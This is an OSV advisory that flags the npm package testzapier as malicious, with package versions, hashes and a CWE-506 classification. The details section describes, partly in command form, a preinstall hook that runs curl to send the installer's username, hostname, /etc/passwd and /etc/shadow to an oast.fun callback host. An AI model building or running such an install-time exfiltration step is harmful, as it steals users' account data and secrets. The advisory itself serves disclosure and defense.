MAL-2026-5575

Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/testzapier/MAL-2026-5575.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5575
Published
2026-06-11T04:37:03Z
Modified
2026-06-11T05:46:34.816239928Z
Summary
Malicious code in testzapier (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f)

package.json declares a preinstall hook (node index.js) that fires automatically on npm install. index.js spawns a shell that runs curl -X POST against http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of id. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running npm install testzapier leaks host identity and local-account/secret-file contents to the attacker.

Database specific
{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-005461",
            "versions": [
                "1.0.1"
            ],
            "sha256": "045f2a9515d6ea6e0d97f528486c1ed7ffb6626ae018c414b5842ba2db15fac1",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T04:37:10Z",
            "import_time": "2026-06-11T05:40:57.221108557Z"
        },
        {
            "id": "IN-MAL-2026-005460",
            "import_time": "2026-06-11T05:40:57.127194827Z",
            "sha256": "a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f",
            "source": "amazon-inspector",
            "modified_time": "2026-06-11T04:37:03Z",
            "versions": [
                "1.0.0"
            ]
        }
    ]
}

Affected packages

npm / testzapier

Package

Affected ranges

Affected versions

1.*
1.0.0
1.0.1

Database specific

source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/testzapier/MAL-2026-5575.json"
cwes
[
    {
        "cweId": "CWE-506",
        "name": "Embedded Malicious Code",
        "description": "The product contains code that appears to be malicious in nature."
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
indicators
{
    "evidence_files": [
        {
            "path": "index.js",
            "sha256": "fbaabfcebd13909c0b2cfb768cce31fa97ad5d44c303eb328ee3d84351e68852",
            "tlsh": "cef0dc5a48f5e83677f218bcef049c1f7747ea800436b35354ef6618235c9a884aa0b7"
        },
        {
            "path": "package.json",
            "sha256": "db06e32ac36e947460a4855b1a1ea12fcd4d710051eaf8bbc809eb4334c631d0",
            "tlsh": "5fd05e245e23953365c4266a1d2aa4867261cebf08143c0da3db142e93cf67798ff32c"
        }
    ],
    "package_integrity": [
        {
            "filename": "testzapier-1.0.1.tgz",
            "hashes": {
                "sha512_sri": "sha512-wiKHGj8gNG+rJpnPbwH1OUDqA4JXnuW91SO1N2tyk4U6VGtpWSQbkXGAeM9HirAwvwUylQCpW8ZW74GRjAKl/g==",
                "sha1": "18b84099166da0d71bf41fe7992b13d2a01e1b08"
            }
        }
    ]
}